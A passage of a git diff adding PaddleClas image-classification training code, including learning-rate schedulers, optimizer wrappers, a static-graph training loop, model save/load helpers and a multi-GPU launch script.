warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.step_size = step_each_epoch * step_size + self.learning_rate = learning_rate + self.gamma = gamma + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.StepDecay( + learning_rate=self.learning_rate, + step_size=self.step_size, + gamma=self.gamma, + last_epoch=self.last_epoch) + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.learning_rate, + last_epoch=self.last_epoch) + return learning_rate + + +class Piecewise(object): + """ + Piecewise learning rate decay + Args: + boundaries(list): A list of steps numbers. The type of element in the list is python int. + values(list): A list of learning rate values that will be picked during different epoch boundaries. + The type of element in the list is python float. + warmup_epoch(int): The epoch numbers for LinearWarmup. Default: 0. + warmup_start_lr(float): Initial learning rate of warm up. Default: 0.0. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + """ + + def __init__(self, + step_each_epoch, + decay_epochs, + values, + epochs, + warmup_epoch=0, + warmup_start_lr=0.0, + last_epoch=-1, + **kwargs): + super().__init__() + if warmup_epoch >= epochs: + msg = f"When using warm up, the value of \"Global.epochs\" must be greater than value of \"Optimizer.lr.warmup_epoch\". The value of \"Optimizer.lr.warmup_epoch\" has been set to {epochs}." + logger.warning(msg) + warmup_epoch = epochs + self.boundaries = [step_each_epoch * e for e in decay_epochs] + self.values = values + self.last_epoch = last_epoch + self.warmup_steps = round(warmup_epoch * step_each_epoch) + self.warmup_start_lr = warmup_start_lr + + def __call__(self): + learning_rate = lr.PiecewiseDecay( + boundaries=self.boundaries, + values=self.values, + last_epoch=self.last_epoch) + if self.warmup_steps > 0: + learning_rate = lr.LinearWarmup( + learning_rate=learning_rate, + warmup_steps=self.warmup_steps, + start_lr=self.warmup_start_lr, + end_lr=self.values[0], + last_epoch=self.last_epoch) + return learning_rate + + +class MultiStepDecay(LRScheduler): + """ + Update the learning rate by ``gamma`` once ``epoch`` reaches one of the milestones. + The algorithm can be described as the code below. + .. code-block:: text + learning_rate = 0.5 + milestones = [30, 50] + gamma = 0.1 + if epoch < 30: + learning_rate = 0.5 + elif epoch < 50: + learning_rate = 0.05 + else: + learning_rate = 0.005 + Args: + learning_rate (float): The initial learning rate. It is a python float number. + milestones (tuple|list): List or tuple of each boundaries. Must be increasing. + gamma (float, optional): The Ratio that the learning rate will be reduced. ``new_lr = origin_lr * gamma`` . + It should be less than 1.0. Default: 0.1. + last_epoch (int, optional): The index of last epoch. Can be set to restart training. Default: -1, means initial learning rate. + verbose (bool, optional): If ``True``, prints a message to stdout for each update. Default: ``False`` . + + Returns: + ``MultiStepDecay`` instance to schedule learning rate. + Examples: + + .. code-block:: python + import paddle + import numpy as np + # train on default dynamic graph mode + linear = paddle.nn.Linear(10, 10) + scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=0.5, milestones=[2, 4, 6], gamma=0.8, verbose=True) + sgd = paddle.optimizer.SGD(learning_rate=scheduler, parameters=linear.parameters()) + for epoch in range(20): + for batch_id in range(5): + x = paddle.uniform([10, 10]) + out = linear(x) + loss = paddle.mean(out) + loss.backward() + sgd.step() + sgd.clear_gradients() + scheduler.step() # If you update learning rate each step + # scheduler.step() # If you update learning rate each epoch + # train on static graph mode + paddle.enable_static() + main_prog = paddle.static.Program() + start_prog = paddle.static.Program() + with paddle.static.program_guard(main_prog, start_prog): + x = paddle.static.data(name='x', shape=[None, 4, 5]) + y = paddle.static.data(name='y', shape=[None, 4, 5]) + z = paddle.static.nn.fc(x, 100) + loss = paddle.mean(z) + scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=0.5, milestones=[2, 4, 6], gamma=0.8, verbose=True) + sgd = paddle.optimizer.SGD(learning_rate=scheduler) + sgd.minimize(loss) + exe = paddle.static.Executor() + exe.run(start_prog) + for epoch in range(20): + for batch_id in range(5): + out = exe.run( + main_prog, + feed={ + 'x': np.random.randn(3, 4, 5).astype('float32'), + 'y': np.random.randn(3, 4, 5).astype('float32') + }, + fetch_list=loss.name) + scheduler.step() # If you update learning rate each step + # scheduler.step() # If you update learning rate each epoch + """ + + def __init__(self, + learning_rate, + milestones, + epochs, + step_each_epoch, + gamma=0.1, + last_epoch=-1, + verbose=False): + if not isinstance(milestones, (tuple, list)): + raise TypeError( + "The type of 'milestones' in 'MultiStepDecay' must be 'tuple, list', but received %s." + % type(milestones)) + if not all([ + milestones[i] < milestones[i + 1] + for i in range(len(milestones) - 1) + ]): + raise ValueError('The elements of milestones must be incremented') + if gamma >= 1.0: + raise ValueError('gamma should be < 1.0.') + self.milestones = [x * step_each_epoch for x in milestones] + self.gamma = gamma + super().__init__(learning_rate, last_epoch, verbose) + + def get_lr(self): + for i in range(len(self.milestones)): + if self.last_epoch < self.milestones[i]: + return self.base_lr * (self.gamma**i) + return self.base_lr * (self.gamma**len(self.milestones)) diff --git a/Smart_container/PaddleClas/ppcls/optimizer/optimizer.py b/Smart_container/PaddleClas/ppcls/optimizer/optimizer.py new file mode 100644 index 0000000..72310f2 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/optimizer/optimizer.py @@ -0,0 +1,189 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +from paddle import optimizer as optim + + +class Momentum(object): + """ + Simple Momentum optimizer with velocity state. + Args: + learning_rate (float|Variable) - The learning rate used to update parameters. + Can be a float value or a Variable with one float value as data element. + momentum (float) - Momentum factor. + regularization (WeightDecayRegularizer, optional) - The strategy of regularization. + """ + + def __init__(self, + learning_rate, + momentum, + weight_decay=None, + grad_clip=None, + multi_precision=False): + super().__init__() + self.learning_rate = learning_rate + self.momentum = momentum + self.weight_decay = weight_decay + self.grad_clip = grad_clip + self.multi_precision = multi_precision + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + opt = optim.Momentum( + learning_rate=self.learning_rate, + momentum=self.momentum, + weight_decay=self.weight_decay, + grad_clip=self.grad_clip, + multi_precision=self.multi_precision, + parameters=parameters) + return opt + + +class Adam(object): + def __init__(self, + learning_rate=0.001, + beta1=0.9, + beta2=0.999, + epsilon=1e-08, + parameter_list=None, + weight_decay=None, + grad_clip=None, + name=None, + lazy_mode=False, + multi_precision=False): + self.learning_rate = learning_rate + self.beta1 = beta1 + self.beta2 = beta2 + self.epsilon = epsilon + self.parameter_list = parameter_list + self.learning_rate = learning_rate + self.weight_decay = weight_decay + self.grad_clip = grad_clip + self.name = name + self.lazy_mode = lazy_mode + self.multi_precision = multi_precision + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + opt = optim.Adam( + learning_rate=self.learning_rate, + beta1=self.beta1, + beta2=self.beta2, + epsilon=self.epsilon, + weight_decay=self.weight_decay, + grad_clip=self.grad_clip, + name=self.name, + lazy_mode=self.lazy_mode, + multi_precision=self.multi_precision, + parameters=parameters) + return opt + + +class RMSProp(object): + """ + Root Mean Squared Propagation (RMSProp) is an unpublished, adaptive learning rate method. + Args: + learning_rate (float|Variable) - The learning rate used to update parameters. + Can be a float value or a Variable with one float value as data element. + momentum (float) - Momentum factor. + rho (float) - rho value in equation. + epsilon (float) - avoid division by zero, default is 1e-6. + regularization (WeightDecayRegularizer, optional) - The strategy of regularization. + """ + + def __init__(self, + learning_rate, + momentum=0.0, + rho=0.95, + epsilon=1e-6, + weight_decay=None, + grad_clip=None, + multi_precision=False): + super().__init__() + self.learning_rate = learning_rate + self.momentum = momentum + self.rho = rho + self.epsilon = epsilon + self.weight_decay = weight_decay + self.grad_clip = grad_clip + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + opt = optim.RMSProp( + learning_rate=self.learning_rate, + momentum=self.momentum, + rho=self.rho, + epsilon=self.epsilon, + weight_decay=self.weight_decay, + grad_clip=self.grad_clip, + parameters=parameters) + return opt + + +class AdamW(object): + def __init__(self, + learning_rate=0.001, + beta1=0.9, + beta2=0.999, + epsilon=1e-8, + weight_decay=None, + multi_precision=False, + grad_clip=None, + no_weight_decay_name=None, + one_dim_param_no_weight_decay=False, + **args): + super().__init__() + self.learning_rate = learning_rate + self.beta1 = beta1 + self.beta2 = beta2 + self.epsilon = epsilon + self.grad_clip = grad_clip + self.weight_decay = weight_decay + self.multi_precision = multi_precision + self.no_weight_decay_name_list = no_weight_decay_name.split( + ) if no_weight_decay_name else [] + self.one_dim_param_no_weight_decay = one_dim_param_no_weight_decay + + def __call__(self, model_list): + parameters = sum([m.parameters() for m in model_list], []) + + self.no_weight_decay_param_name_list = [ + p.name for model in model_list for n, p in model.named_parameters() + if any(nd in n for nd in self.no_weight_decay_name_list) + ] + + if self.one_dim_param_no_weight_decay: + self.no_weight_decay_param_name_list += [ + p.name for model in model_list + for n, p in model.named_parameters() if len(p.shape) == 1 + ] + + opt = optim.AdamW( + learning_rate=self.learning_rate, + beta1=self.beta1, + beta2=self.beta2, + epsilon=self.epsilon, + parameters=parameters, + weight_decay=self.weight_decay, + multi_precision=self.multi_precision, + grad_clip=self.grad_clip, + apply_decay_param_fun=self._apply_decay_param_fun) + return opt + + def _apply_decay_param_fun(self, name): + return name not in self.no_weight_decay_param_name_list diff --git a/Smart_container/PaddleClas/ppcls/static/program.py b/Smart_container/PaddleClas/ppcls/static/program.py new file mode 100644 index 0000000..34608fc --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/program.py @@ -0,0 +1,445 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import os +import time +import numpy as np + +from collections import OrderedDict + +import paddle +import paddle.nn.functional as F + +from paddle.distributed import fleet +from paddle.distributed.fleet import DistributedStrategy + +# from ppcls.optimizer import OptimizerBuilder +# from ppcls.optimizer.learning_rate import LearningRateBuilder + +from ppcls.arch import build_model +from ppcls.loss import build_loss +from ppcls.metric import build_metrics +from ppcls.optimizer import build_optimizer +from ppcls.optimizer import build_lr_scheduler + +from ppcls.utils.misc import AverageMeter +from ppcls.utils import logger, profiler + + +def create_feeds(image_shape, use_mix=None, dtype="float32"): + """ + Create feeds as model input + + Args: + image_shape(list[int]): model input shape, such as [3, 224, 224] + use_mix(bool): whether to use mix(include mixup, cutmix, fmix) + + Returns: + feeds(dict): dict of model input variables + """ + feeds = OrderedDict() + feeds['data'] = paddle.static.data( + name="data", shape=[None] + image_shape, dtype=dtype) + if use_mix: + feeds['y_a'] = paddle.static.data( + name="y_a", shape=[None, 1], dtype="int64") + feeds['y_b'] = paddle.static.data( + name="y_b", shape=[None, 1], dtype="int64") + feeds['lam'] = paddle.static.data( + name="lam", shape=[None, 1], dtype=dtype) + else: + feeds['label'] = paddle.static.data( + name="label", shape=[None, 1], dtype="int64") + + return feeds + + +def create_fetchs(out, + feeds, + architecture, + topk=5, + epsilon=None, + use_mix=False, + config=None, + mode="Train"): + """ + Create fetchs as model outputs(included loss and measures), + will call create_loss and create_metric(if use_mix). + Args: + out(variable): model output variable + feeds(dict): dict of model input variables. + If use mix_up, it will not include label. + architecture(dict): architecture information, + name(such as ResNet50) is needed + topk(int): usually top5 + epsilon(float): parameter for label smoothing, 0.0 <= epsilon <= 1.0 + use_mix(bool): whether to use mix(include mixup, cutmix, fmix) + config(dict): model config + + Returns: + fetchs(dict): dict of model outputs(included loss and measures) + """ + fetchs = OrderedDict() + # build loss + if use_mix: + y_a = paddle.reshape(feeds['y_a'], [-1, 1]) + y_b = paddle.reshape(feeds['y_b'], [-1, 1]) + lam = paddle.reshape(feeds['lam'], [-1, 1]) + else: + target = paddle.reshape(feeds['label'], [-1, 1]) + + loss_func = build_loss(config["Loss"][mode]) + + if use_mix: + loss_dict = loss_func(out, [y_a, y_b, lam]) + else: + loss_dict = loss_func(out, target) + + loss_out = loss_dict["loss"] + fetchs['loss'] = (loss_out, AverageMeter('loss', '7.4f', need_avg=True)) + + # build metric + if not use_mix: + metric_func = build_metrics(config["Metric"][mode]) + + metric_dict = metric_func(out, target) + + for key in metric_dict: + if mode != "Train" and paddle.distributed.get_world_size() > 1: + paddle.distributed.all_reduce( + metric_dict[key], op=paddle.distributed.ReduceOp.SUM) + metric_dict[key] = metric_dict[ + key] / paddle.distributed.get_world_size() + + fetchs[key] = (metric_dict[key], AverageMeter( + key, '7.4f', need_avg=True)) + + return fetchs + + +def create_optimizer(config, step_each_epoch): + # create learning_rate instance + optimizer, lr_sch = build_optimizer( + config["Optimizer"], config["Global"]["epochs"], step_each_epoch) + return optimizer, lr_sch + + +def create_strategy(config): + """ + Create build strategy and exec strategy. + + Args: + config(dict): config + + Returns: + build_strategy: build strategy + exec_strategy: exec strategy + """ + build_strategy = paddle.static.BuildStrategy() + exec_strategy = paddle.static.ExecutionStrategy() + + exec_strategy.num_threads = 1 + exec_strategy.num_iteration_per_drop_scope = ( + 10000 + if 'AMP' in config and config.AMP.get("use_pure_fp16", False) else 10) + + fuse_op = True if 'AMP' in config else False + + fuse_bn_act_ops = config.get('fuse_bn_act_ops', fuse_op) + fuse_elewise_add_act_ops = config.get('fuse_elewise_add_act_ops', fuse_op) + fuse_bn_add_act_ops = config.get('fuse_bn_add_act_ops', fuse_op) + enable_addto = config.get('enable_addto', fuse_op) + + build_strategy.fuse_bn_act_ops = fuse_bn_act_ops + build_strategy.fuse_elewise_add_act_ops = fuse_elewise_add_act_ops + build_strategy.fuse_bn_add_act_ops = fuse_bn_add_act_ops + build_strategy.enable_addto = enable_addto + + return build_strategy, exec_strategy + + +def dist_optimizer(config, optimizer): + """ + Create a distributed optimizer based on a normal optimizer + + Args: + config(dict): + optimizer(): a normal optimizer + + Returns: + optimizer: a distributed optimizer + """ + build_strategy, exec_strategy = create_strategy(config) + + dist_strategy = DistributedStrategy() + dist_strategy.execution_strategy = exec_strategy + dist_strategy.build_strategy = build_strategy + + dist_strategy.nccl_comm_num = 1 + dist_strategy.fuse_all_reduce_ops = True + dist_strategy.fuse_grad_size_in_MB = 16 + optimizer = fleet.distributed_optimizer(optimizer, strategy=dist_strategy) + + return optimizer + + +def mixed_precision_optimizer(config, optimizer): + if 'AMP' in config: + amp_cfg = config.AMP if config.AMP else dict() + scale_loss = amp_cfg.get('scale_loss', 1.0) + use_dynamic_loss_scaling = amp_cfg.get('use_dynamic_loss_scaling', + False) + use_pure_fp16 = amp_cfg.get('use_pure_fp16', False) + optimizer = paddle.static.amp.decorate( + optimizer, + init_loss_scaling=scale_loss, + use_dynamic_loss_scaling=use_dynamic_loss_scaling, + use_pure_fp16=use_pure_fp16, + use_fp16_guard=True) + + return optimizer + + +def build(config, + main_prog, + startup_prog, + step_each_epoch=100, + is_train=True, + is_distributed=True): + """ + Build a program using a model and an optimizer + 1. create feeds + 2. create a dataloader + 3. create a model + 4. create fetchs + 5. create an optimizer + + Args: + config(dict): config + main_prog(): main program + startup_prog(): startup program + is_train(bool): train or eval + is_distributed(bool): whether to use distributed training method + + Returns: + dataloader(): a bridge between the model and the data + fetchs(dict): dict of model outputs(included loss and measures) + """ + with paddle.static.program_guard(main_prog, startup_prog): + with paddle.utils.unique_name.guard(): + mode = "Train" if is_train else "Eval" + use_mix = "batch_transform_ops" in config["DataLoader"][mode][ + "dataset"] + use_dali = config["Global"].get('use_dali', False) + feeds = create_feeds( + config["Global"]["image_shape"], + use_mix=use_mix, + dtype="float32") + + # build model + # data_format should be assigned in arch-dict + input_image_channel = config["Global"]["image_shape"][ + 0] # default as [3, 224, 224] + model = build_model(config["Arch"]) + out = model(feeds["data"]) + # end of build model + + fetchs = create_fetchs( + out, + feeds, + config["Arch"], + epsilon=config.get('ls_epsilon'), + use_mix=use_mix, + config=config, + mode=mode) + lr_scheduler = None + optimizer = None + if is_train: + optimizer, lr_scheduler = build_optimizer( + config["Optimizer"], config["Global"]["epochs"], + step_each_epoch) + optimizer = mixed_precision_optimizer(config, optimizer) + if is_distributed: + optimizer = dist_optimizer(config, optimizer) + optimizer.minimize(fetchs['loss'][0]) + return fetchs, lr_scheduler, feeds, optimizer + + +def compile(config, program, loss_name=None, share_prog=None): + """ + Compile the program + + Args: + config(dict): config + program(): the program which is wrapped by + loss_name(str): loss name + share_prog(): the shared program, used for evaluation during training + + Returns: + compiled_program(): a compiled program + """ + build_strategy, exec_strategy = create_strategy(config) + + compiled_program = paddle.static.CompiledProgram( + program).with_data_parallel( + share_vars_from=share_prog, + loss_name=loss_name, + build_strategy=build_strategy, + exec_strategy=exec_strategy) + + return compiled_program + + +total_step = 0 + + +def run(dataloader, + exe, + program, + feeds, + fetchs, + epoch=0, + mode='train', + config=None, + vdl_writer=None, + lr_scheduler=None, + profiler_options=None): + """ + Feed data to the model and fetch the measures and loss + + Args: + dataloader(paddle io dataloader): + exe(): + program(): + fetchs(dict): dict of measures and the loss + epoch(int): epoch of training or evaluation + model(str): log only + + Returns: + """ + fetch_list = [f[0] for f in fetchs.values()] + metric_dict = OrderedDict([("lr", AverageMeter( + 'lr', 'f', postfix=",", need_avg=False))]) + + for k in fetchs: + metric_dict[k] = fetchs[k][1] + + metric_dict["batch_time"] = AverageMeter( + 'batch_cost', '.5f', postfix=" s,") + metric_dict["reader_time"] = AverageMeter( + 'reader_cost', '.5f', postfix=" s,") + + for m in metric_dict.values(): + m.reset() + + use_dali = config["Global"].get('use_dali', False) + tic = time.time() + + if not use_dali: + dataloader = dataloader() + + idx = 0 + batch_size = None + while True: + # The DALI maybe raise RuntimeError for some particular images, such as ImageNet1k/n04418357_26036.JPEG + try: + batch = next(dataloader) + except StopIteration: + break + except RuntimeError: + logger.warning( + "Except RuntimeError when reading data from dataloader, try to read once again..." + ) + continue + idx += 1 + # ignore the warmup iters + if idx == 5: + metric_dict["batch_time"].reset() + metric_dict["reader_time"].reset() + + metric_dict['reader_time'].update(time.time() - tic) + + profiler.add_profiler_step(profiler_options) + + if use_dali: + batch_size = batch[0]["data"].shape()[0] + feed_dict = batch[0] + else: + batch_size = batch[0].shape()[0] + feed_dict = { + key.name: batch[idx] + for idx, key in enumerate(feeds.values()) + } + + metrics = exe.run(program=program, + feed=feed_dict, + fetch_list=fetch_list) + + for name, m in zip(fetchs.keys(), metrics): + metric_dict[name].update(np.mean(m), batch_size) + metric_dict["batch_time"].update(time.time() - tic) + if mode == "train": + metric_dict['lr'].update(lr_scheduler.get_lr()) + + fetchs_str = ' '.join([ + str(metric_dict[key].mean) + if "time" in key else str(metric_dict[key].value) + for key in metric_dict + ]) + ips_info = " ips: {:.5f} images/sec.".format( + batch_size / metric_dict["batch_time"].avg) + fetchs_str += ips_info + + if lr_scheduler is not None: + lr_scheduler.step() + + if vdl_writer: + global total_step + logger.scaler('loss', metrics[0][0], total_step, vdl_writer) + total_step += 1 + if mode == 'eval': + if idx % config.get('print_interval', 10) == 0: + logger.info("{:s} step:{:<4d} {:s}".format(mode, idx, + fetchs_str)) + else: + epoch_str = "epoch:{:<3d}".format(epoch) + step_str = "{:s} step:{:<4d}".format(mode, idx) + + if idx % config.get('print_interval', 10) == 0: + logger.info("{:s} {:s} {:s}".format(epoch_str, step_str, + fetchs_str)) + + tic = time.time() + + end_str = ' '.join([str(m.mean) for m in metric_dict.values()] + + [metric_dict["batch_time"].total]) + ips_info = "ips: {:.5f} images/sec.".format( + batch_size * metric_dict["batch_time"].count / + metric_dict["batch_time"].sum) + if mode == 'eval': + logger.info("END {:s} {:s} {:s}".format(mode, end_str, ips_info)) + else: + end_epoch_str = "END epoch:{:<3d}".format(epoch) + logger.info("{:s} {:s} {:s} {:s}".format(end_epoch_str, mode, end_str, + ips_info)) + if use_dali: + dataloader.reset() + + # return top1_acc in order to save the best model + if mode == 'eval': + return fetchs["top1"][1].avg diff --git a/Smart_container/PaddleClas/ppcls/static/run_dali.sh b/Smart_container/PaddleClas/ppcls/static/run_dali.sh new file mode 100644 index 0000000..8b33b28 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/run_dali.sh @@ -0,0 +1,11 @@ +#!/usr/bin/env bash + +export CUDA_VISIBLE_DEVICES="0,1,2,3,4,5,6,7" +export FLAGS_fraction_of_gpu_memory_to_use=0.80 + +python3.7 -m paddle.distributed.launch \ + --gpus="0,1,2,3,4,5,6,7" \ + ppcls/static//train.py \ + -c ./ppcls/configs/ImageNet/ResNet/ResNet50_fp16.yaml \ + -o Global.use_dali=True + diff --git a/Smart_container/PaddleClas/ppcls/static/save_load.py b/Smart_container/PaddleClas/ppcls/static/save_load.py new file mode 100644 index 0000000..13badfd --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/save_load.py @@ -0,0 +1,139 @@ +# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import errno +import os +import re +import shutil +import tempfile + +import paddle + +from ppcls.utils import logger + +__all__ = ['init_model', 'save_model'] + + +def _mkdir_if_not_exist(path): + """ + mkdir if not exists, ignore the exception when multiprocess mkdir together + """ + if not os.path.exists(path): + try: + os.makedirs(path) + except OSError as e: + if e.errno == errno.EEXIST and os.path.isdir(path): + logger.warning( + 'be happy if some process has already created {}'.format( + path)) + else: + raise OSError('Failed to mkdir {}'.format(path)) + + +def _load_state(path): + if os.path.exists(path + '.pdopt'): + # XXX another hack to ignore the optimizer state + tmp = tempfile.mkdtemp() + dst = os.path.join(tmp, os.path.basename(os.path.normpath(path))) + shutil.copy(path + '.pdparams', dst + '.pdparams') + state = paddle.static.load_program_state(dst) + shutil.rmtree(tmp) + else: + state = paddle.static.load_program_state(path) + return state + + +def load_params(exe, prog, path, ignore_params=None): + """ + Load model from the given path. + Args: + exe (fluid.Executor): The fluid.Executor object. + prog (fluid.Program): load weight to which Program object. + path (string): URL string or loca model path. + ignore_params (list): ignore variable to load when finetuning. + It can be specified by finetune_exclude_pretrained_params + and the usage can refer to the document + docs/advanced_tutorials/TRANSFER_LEARNING.md + """ + if not (os.path.isdir(path) or os.path.exists(path + '.pdparams')): + raise ValueError("Model pretrain path {} does not " + "exists.".format(path)) + + logger.info("Loading parameters from {}...".format(path)) + + ignore_set = set() + state = _load_state(path) + + # ignore the parameter which mismatch the shape + # between the model and pretrain weight. + all_var_shape = {} + for block in prog.blocks: + for param in block.all_parameters(): + all_var_shape[param.name] = param.shape + ignore_set.update([ + name for name, shape in all_var_shape.items() + if name in state and shape != state[name].shape + ]) + + if ignore_params: + all_var_names = [var.name for var in prog.list_vars()] + ignore_list = filter( + lambda var: any([re.match(name, var) for name in ignore_params]), + all_var_names) + ignore_set.update(list(ignore_list)) + + if len(ignore_set) > 0: + for k in ignore_set: + if k in state: + logger.warning( + 'variable {} is already excluded automatically'.format(k)) + del state[k] + + paddle.static.set_program_state(prog, state) + + +def init_model(config, program, exe): + """ + load model from checkpoint or pretrained_model + """ + checkpoints = config.get('checkpoints') + if checkpoints: + paddle.static.load(program, checkpoints, exe) + logger.info("Finish initing model from {}".format(checkpoints)) + return + + pretrained_model = config.get('pretrained_model') + if pretrained_model: + if not isinstance(pretrained_model, list): + pretrained_model = [pretrained_model] + for pretrain in pretrained_model: + load_params(exe, program, pretrain) + logger.info("Finish initing model from {}".format(pretrained_model)) + + +def save_model(program, model_path, epoch_id, prefix='ppcls'): + """ + save model to the target path + """ + if paddle.distributed.get_rank() != 0: + return + model_path = os.path.join(model_path, str(epoch_id)) + _mkdir_if_not_exist(model_path) + model_prefix = os.path.join(model_path, prefix) + paddle.static.save(program, model_prefix) + logger.info("Already save model in {}".format(model_path)) diff --git a/Smart_container/PaddleClas/ppcls/static/train.py b/Smart_container/PaddleClas/ppcls/static/train.py new file mode 100644 index 0000000..a3aa0b5 --- /dev/null +++ b/Smart_container/PaddleClas/ppcls/static/train.py @@ -0,0 +1,204 @@ +# copyright (c) 2020 PaddlePaddle Authors. All Rights Reserve. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. + +from __future__ import absolute_import +from __future__ import division +from __future__ import print_function + +import argparse +import os +import sys +__dir__ = os.path.dirname(os.path.abspath(__file__)) +sys.path.append(__dir__) +sys.path.append(os.path.abspath(os.path.join(__dir__, '../../'))) + +import paddle +from paddle.distributed import fleet +from visualdl import LogWriter + +from ppcls.data import build_dataloader +from ppcls.utils.config import get_config, print_config +from ppcls.utils import logger +from ppcls.utils.logger import init_logger +from ppcls.static.save_load import init_model, save_model +from ppcls.static import program + + +def parse_args(): + parser = argparse.ArgumentParser("PaddleClas train script") + parser.add_argument( + '-c', + '--config', + type=str, + default='configs/ResNet/ResNet50.yaml', + help='config file path') + parser.add_argument( + '-p', + '--profiler_options', + type=str, + default=None, + help='The option of profiler, which should be in format \"key1=value1;key2=value2;key3=value3\".' + ) + parser.add_argument( + '-o', + '--override', + action='append', + default=[], + help='config options to be overridden') + args = parser.parse_args() + return args + + +def main(args): + """ + all the config of training paradigm should be in config["Global"] + """ + config = get_config(args.config, overrides=args.override, show=False) + global_config = config["Global"] + + mode = "train" + + log_file = os.path.join(global_config['output_dir'], + config["Arch"]["name"], f"{mode}.log") + init_logger(name='root', log_file=log_file) + print_config(config) + + if global_config.get("is_distributed", True): + fleet.init(is_collective=True) + # assign the device + use_gpu = global_config.get("use_gpu", True) + # amp related config + if 'AMP' in config: + AMP_RELATED_FLAGS_SETTING = { + 'FLAGS_cudnn_exhaustive_search': "1", + 'FLAGS_conv_workspace_size_limit': "1500", + 'FLAGS_cudnn_batchnorm_spatial_persistent': "1", + 'FLAGS_max_indevice_grad_add': "8", + "FLAGS_cudnn_batchnorm_spatial_persistent": "1", + } + for k in AMP_RELATED_FLAGS_SETTING: + os.environ[k] = AMP_RELATED_FLAGS_SETTING[k] + + use_xpu = global_config.get("use_xpu", False) + assert ( + use_gpu and use_xpu + ) is not True, "gpu and xpu can not be true in the same time in static mode!" + + if use_gpu: + device = paddle.set_device('gpu') + elif use_xpu: + device = paddle.set_device('xpu') + else: + device = paddle.set_device('cpu') + + # visualDL + vdl_writer = None + if global_config["use_visualdl"]: + vdl_dir = os.path.join(global_config["output_dir"], "vdl") + vdl_writer = LogWriter(vdl_dir) + + # build dataloader + eval_dataloader = None + use_dali = global_config.get('use_dali', False) + + train_dataloader = build_dataloader( + config["DataLoader"], "Train", device=device, use_dali=use_dali) + if global_config["eval_during_train"]: + eval_dataloader = build_dataloader( + config["DataLoader"], "Eval", device=device, use_dali=use_dali) + + step_each_epoch = len(train_dataloader) + + # startup_prog is used to do some parameter init work, + # and train prog is used to hold the network + startup_prog = paddle.static.Program() + train_prog = paddle.static.Program() + + best_top1_acc = 0.0 # best top1 acc record + + train_fetchs, lr_scheduler, train_feeds, optimizer = program.build( + config, + train_prog, + startup_prog, + step_each_epoch=step_each_epoch, + is_train=True, + is_distributed=global_config.get("is_distributed", True)) + + if global_config["eval_during_train"]: + eval_prog = paddle.static.Program() + eval_fetchs, _, eval_feeds, _ = program.build( + config, + eval_prog, + startup_prog, + is_train=False, + is_distributed=global_config.get("is_distributed", True)) + # clone to prune some content which is irrelevant in eval_prog + eval_prog = eval_prog.clone(for_test=True) + + # create the "Executor" with the statement of which device + exe = paddle.static.Executor(device) + # Parameter initialization + exe.run(startup_prog) + # load pretrained models or checkpoints + init_model(global_config, train_prog, exe) + + if 'AMP' in config and config.AMP.get("use_pure_fp16", False): + optimizer.amp_init( + device, + scope=paddle.static.global_scope(), + test_program=eval_prog + if global_config["eval_during_train"] else None) + + if not global_config.get("is_distributed", True): + compiled_train_prog = program.compile( + config, train_prog, loss_name=train_fetchs["loss"][0].name) + else: + compiled_train_prog = train_prog + + if eval_dataloader is not None: + compiled_eval_prog = program.compile(config, eval_prog) + + for epoch_id in range(global_config["epochs"]): + # 1. train with train dataset + program.run(train_dataloader, exe, compiled_train_prog, train_feeds, + train_fetchs, epoch_id, 'train', config, vdl_writer, + lr_scheduler, args.profiler_options) + # 2. evaate with eval dataset + if global_config["eval_during_train"] and epoch_id % global_config[ + 